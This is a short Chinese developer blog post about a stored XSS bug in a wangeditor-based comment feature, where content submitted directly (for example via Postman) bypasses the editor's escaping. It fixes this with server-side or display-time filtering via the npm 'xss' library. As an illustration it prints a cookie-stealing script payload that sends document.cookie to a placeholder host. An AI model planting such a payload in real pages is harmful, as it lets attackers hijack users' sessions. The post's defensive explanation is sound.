bug-xss 攻击漏洞问题

web张2023-11-18 15:30

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码 
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码 
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
phltxy12 分钟前
Vue Router:从入门到实战
前端·javascript·vue.js
Zhencode35 分钟前
Vue3核心运行时之runtime-core
前端·javascript·vue.js
木斯佳39 分钟前
前端八股文面经大全:腾讯WXG技术架构前端面试(2025-11-19)·面经深度解析
前端·面试·架构
感性的程序员小王1 小时前
HTTPS页面请求HTTP接口失败?一文讲透Mixed Content
前端·后端
用户600071819101 小时前
【翻译】我竟渐渐迷上了生成器的设计巧思
前端
Wect1 小时前
LeetCode 104. 二叉树的最大深度:解题思路+代码解析
前端·算法·typescript
千寻girling1 小时前
面试官 : “ 请说一下 JS 的常见的数组 和 字符串方法有哪些 ? ”
前端·javascript·面试
Wect1 小时前
LeetCode 100. 相同的树:两种解法(递归+迭代)详解
前端·算法·typescript
我是伪码农1 小时前
Vue 大事件管理系统
前端·javascript·vue.js
henry1010101 小时前
DeepSeek生成的网页版小游戏 - 冰壶
前端·javascript·css·html5
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02使用 1panel面板 部署 php网站03GitHub 镜像站点04PHP Error: 常见错误及其解决方法05AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07如何将 TRAE IDE 的插件市场源切换至 VS Code 官方市场08openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南09MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)